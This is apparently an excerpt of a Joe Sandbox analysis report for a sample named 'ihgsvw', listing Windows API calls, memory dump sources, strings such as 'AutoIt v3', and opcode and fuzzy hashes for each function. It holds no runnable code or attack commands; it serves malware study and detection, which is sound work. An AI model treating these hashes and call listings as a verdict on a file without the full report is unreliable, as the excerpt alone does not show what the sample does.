                • UnregisterHotKey.USER32(?), ref: 00BA2D1F
                • DestroyWindow.USER32(?), ref: 00BE39F5
                • FreeLibrary.KERNEL32(?), ref: 00BE3A5A
                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BE3A87
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                • String ID: close all
                • API String ID: 469580280-3243417748
                • Opcode ID: ba826a698c93f70ac6d415a19e3a91152f456cd6e849b8b05a1fdce86de01fab
                • Instruction ID: e5406bf3763cc397f9c418279a121c497a80c0ac0d5f48da9bb9cb7f9ac19d87
                • Opcode Fuzzy Hash: ba826a698c93f70ac6d415a19e3a91152f456cd6e849b8b05a1fdce86de01fab
                • Instruction Fuzzy Hash: 49D138317052529FCB29EF29C499B69F7E4EF06B00F1442EDE84A6B252CB31AD52CF50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C18907
                • SetCurrentDirectoryW.KERNELBASE(?), ref: 00C1891B
                • GetFileAttributesW.KERNEL32(?), ref: 00C18945
                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00C1895F
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18971
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C189BA
                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00C18A0A
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CurrentDirectory$AttributesFile
                • String ID: *.*
                • API String ID: 769691225-438819550
                • Opcode ID: ffb767998b968764be9b8a1fa70e22b72969b2df31b87cd9142694a52b120395
                • Instruction ID: 5e252f442b20a3b577c3cfec6e1d80eb1cfd9a30c2b6334ae9496de15d73364b
                • Opcode Fuzzy Hash: ffb767998b968764be9b8a1fa70e22b72969b2df31b87cd9142694a52b120395
                • Instruction Fuzzy Hash: CE81C3725083009BDB20EF15C484AEEB3E9BF86310F54481EF895D7291DB34DE89EB92
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fe988eaafc4bda0d8b5e18436a81830b8936b981d37327b915b28129a0b3e80a
                • Instruction ID: 2684b335276b9920e87f4dee02ab7267f426bb2465ade5f5d8fa24494988bee4
                • Opcode Fuzzy Hash: fe988eaafc4bda0d8b5e18436a81830b8936b981d37327b915b28129a0b3e80a
                • Instruction Fuzzy Hash: A8C1A270A04289AFDB11DFE8D845BADFBF5EF09310F1841DAE815A7392E7309942CB65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32 ref: 00BA3568
                • CreateWindowExW.USER32 ref: 00BA3589
                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA32EF,?), ref: 00BA359D
                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA32EF,?), ref: 00BA35A6
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$CreateShow
                • String ID: AutoIt v3$edit
                • API String ID: 1584632944-3779509399
                • Opcode ID: 6962ccedef09c5c814579f59d0251d8162b39ad9e6df38b8c2e798e77c8e1be8
                • Instruction ID: 9557e6b0e75ddcd28015c96fbf95871848af94974ea35939ad8dfde6e2b7cced
                • Opcode Fuzzy Hash: 6962ccedef09c5c814579f59d0251d8162b39ad9e6df38b8c2e798e77c8e1be8
                • Instruction Fuzzy Hash: AAF0DA716503947AEB3157277C08F3B2EBDD7C7F50F00001EB909A7170D6695891EAB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BA55EB,SwapMouseButtons,00000004,?), ref: 00BA561C
                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BA55EB,SwapMouseButtons,00000004,?), ref: 00BA563D
                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00BA55EB,SwapMouseButtons,00000004,?), ref: 00BA565F
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: Control Panel\Mouse
                • API String ID: 3677997916-824357125
                • Opcode ID: 60da6bb9c8fc6b169b383e5bca1ab3bd4404391baef9c659e5e5f6e4d3d1eca8
                • Instruction ID: 92d153b7bac2174d11b0b5133bc60f7ad42cb99819812ee8fc27c8e2c354db42
                • Opcode Fuzzy Hash: 60da6bb9c8fc6b169b383e5bca1ab3bd4404391baef9c659e5e5f6e4d3d1eca8
                • Instruction Fuzzy Hash: C1117C75614608BFDB208F68DC80EAF77FCEF12744F4044A9F806D7120D6719E4097A0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                • Variable must be of type 'Object'., xrefs: 00BF486A
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID: Variable must be of type 'Object'.
                • API String ID: 0-109567571
                • Opcode ID: c3e38657d1fe6e4055681598f501817d6cd10980bbc24c6da9eda663281f1cbd
                • Instruction ID: bd200ecb7abe2e0d8b28f01b3e5baa00f111afe634f7c06ec783228d53fd438f
                • Opcode Fuzzy Hash: c3e38657d1fe6e4055681598f501817d6cd10980bbc24c6da9eda663281f1cbd
                • Instruction Fuzzy Hash: 9BC25B71A04206DFCB24DF98C880BBEB7F1FF0A310F2481A9E955AB261D775AD41DB51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesW.KERNELBASE(?,00C3DC30), ref: 00C0DABB
                • GetLastError.KERNEL32 ref: 00C0DACA
                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00C0DAD9
                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C3DC30), ref: 00C0DB36
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CreateDirectory$AttributesErrorFileLast
                • String ID:
                • API String ID: 2267087916-0
                • Opcode ID: 1eebd3871ee2f3824bc5423c12477fbec871090f52c3d9d9c6334185defe4b93
                • Instruction ID: 73264886c75463313334bda9d95720624c78e434c56e3498cc9c445c9e816374
                • Opcode Fuzzy Hash: 1eebd3871ee2f3824bc5423c12477fbec871090f52c3d9d9c6334185defe4b93
                • Instruction Fuzzy Hash: 3F217F705183019FC700DF68D881AABB7E4EE56364F144A5DF4AAC72E1D730DE4ADB42
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __Init_thread_footer.LIBCMT ref: 00BB15A2
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Init_thread_footer
                • String ID:
                • API String ID: 1385522511-0
                • Opcode ID: c993e76078cf96587cfd2a00a28953876ba5e18bf87b51b6023a9709f84c500b
                • Instruction ID: 1c6bd07ddc0dcfd11ef30f28da5bbc6477f8efd771de8f7533d06f7e2f2e6230
                • Opcode Fuzzy Hash: c993e76078cf96587cfd2a00a28953876ba5e18bf87b51b6023a9709f84c500b
                • Instruction Fuzzy Hash: 6BB28974A18340CFCB24DF18C490ABAB7E1FB99300F24899DE9899B351D7B1ED45DB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC09F8
                  • Part of subcall function 00BC3634: RaiseException.KERNEL32(?,?,?,00BC0A1A,?,00000000,?,?,?,?,?,?,00BC0A1A,00000000,00C69758,00000000), ref: 00BC3694
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0A15
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Exception@8Throw$ExceptionRaise
                • String ID: Unknown exception
                • API String ID: 3476068407-410509341
                • Opcode ID: f734d5244aef2adb1655ad2fdf176f893ed4fb29e60f763e687bcb6d126da580
                • Instruction ID: 48b04de023136ea13705538f81e7a4da60a9ceaba919ca80c91212449c733d1d
                • Opcode Fuzzy Hash: f734d5244aef2adb1655ad2fdf176f893ed4fb29e60f763e687bcb6d126da580
                • Instruction Fuzzy Hash: 67F0683491420DF78F10BAA8D846F9DB7EC9E00750B6041FCB924D6492EB70EA56C5D0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C28C52
                • TerminateProcess.KERNEL32(00000000), ref: 00C28C59
                • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C28E3A
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Process$CurrentFreeLibraryTerminate
                • String ID:
                • API String ID: 146820519-0
                • Opcode ID: ee7fbbbaf2b737d1ee2a7e8faa5612f33609c5f2f944ed38214b15af93623fb6
                • Instruction ID: b60989cb05c44eff201a93009b5df19b1ad5f043f55638b8eba41a46395cab03
                • Opcode Fuzzy Hash: ee7fbbbaf2b737d1ee2a7e8faa5612f33609c5f2f944ed38214b15af93623fb6
                • Instruction Fuzzy Hash: 32127A75A083519FC714DF28D484B2ABBE5FF89314F04895DE8998B292CB30ED49CF92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _wcslen$_strcat
                • String ID:
                • API String ID: 306214811-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA3236
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA323E
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA3249
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA3254
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA325C
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA3264
                  • Part of subcall function 00BA318C: RegisterWindowMessageW.USER32(00000004,?,00BA2906), ref: 00BA31E4
                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BA29AC
                • OleInitialize.OLE32 ref: 00BA29CA
                • CloseHandle.KERNEL32(00000000,00000000), ref: 00BE39E7
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                • String ID:
                • API String ID: 1986988660-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00BA6CA1
                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00BA6CB1
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA5F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BA6049
                • KillTimer.USER32(?,00000001,?,?), ref: 00BBFD44
                • SetTimer.USER32 ref: 00BBFD53
                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BFFDD3
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: IconNotifyShell_Timer$Kill
                • String ID:
                • API String ID: 3500052701-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00BD895C,?,00C69CE8,0000000C), ref: 00BD8A94
                • GetLastError.KERNEL32(?,00BD895C,?,00C69CE8,0000000C), ref: 00BD8A9E
                • __dosmaperr.LIBCMT ref: 00BD8AC9
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                • String ID:
                • API String ID: 490808831-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00BD97CA,FF8BC369,00000000,00000002,00000000), ref: 00BD9754
                • GetLastError.KERNEL32(?,00BD97CA,FF8BC369,00000000,00000002,00000000,?,00BD5EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00BC6F61), ref: 00BD975E
                • __dosmaperr.LIBCMT ref: 00BD9765
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: ErrorFileLastPointer__dosmaperr
                • String ID:
                • API String ID: 2336955059-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 00BDD1E4
                • _free.LIBCMT ref: 00BDD21D
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDD224
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: EnvironmentStrings$Free_free
                • String ID:
                • API String ID: 2716640707-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • TranslateMessage.USER32(?), ref: 00BAF22B
                • DispatchMessageW.USER32 ref: 00BAF239
                • PeekMessageW.USER32 ref: 00BAF24F
                • Sleep.KERNELBASE(0000000A), ref: 00BAF261
                • TranslateAcceleratorW.USER32(?,?,?), ref: 00BF327C
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                • String ID:
                • API String ID: 3288985973-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __Init_thread_footer.LIBCMT ref: 00BB2FB6
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Init_thread_footer
                • String ID: CALL
                • API String ID: 1385522511-4196123274
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetOpenFileNameW.COMDLG32(?), ref: 00BE4115
                  • Part of subcall function 00BA557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA5558,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BA559E
                  • Part of subcall function 00BA39DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BA39FD
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Name$Path$FileFullLongOpen
                • String ID: X
                • API String ID: 779396738-3081909835
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA5558,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BA559E
                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00C19665
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C19673
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: PrivateProfileStringWrite$FullNamePath
                • String ID:
                • API String ID: 3876400906-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BA3B33,?,00008000), ref: 00BA6E80
                • CreateFileW.KERNELBASE(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00BA3B33,?,00008000), ref: 00BE59A2
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsThemeActive.UXTHEME ref: 00BA32C4
                  • Part of subcall function 00BA326D: SystemParametersInfoW.USER32 ref: 00BA3282
                  • Part of subcall function 00BA326D: SystemParametersInfoW.USER32 ref: 00BA3299
                  • Part of subcall function 00BA3312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00BA32EF,?), ref: 00BA3342
                  • Part of subcall function 00BA3312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00BA32EF,?), ref: 00BA3355
                  • Part of subcall function 00BA3312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C72418,00C72400,?,?,?,?,?,?,00BA32EF,?), ref: 00BA33C1
                  • Part of subcall function 00BA3312: SetCurrentDirectoryW.KERNEL32(?,00000001,00C72418,?,?,?,?,?,?,?,00BA32EF,?), ref: 00BA3442
                • SystemParametersInfoW.USER32 ref: 00BA32FE
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                • String ID:
                • API String ID: 1550534281-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • timeGetTime.WINMM ref: 00BBF97A
                  • Part of subcall function 00BAEDE0: GetInputState.USER32 ref: 00BAEEB7
                • Sleep.KERNEL32(00000000), ref: 00BFFAC2
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: InputSleepStateTimetime
                • String ID:
                • API String ID: 4149333218-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,00BAAE65,?,?,?), ref: 00BA8793
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00BAAE65,?,?,?), ref: 00BA87C9
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: ByteCharMultiWide
                • String ID:
                • API String ID: 626452242-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __Init_thread_footer.LIBCMT ref: 00BACE8E
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Init_thread_footer
                • String ID:
                • API String ID: 1385522511-0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
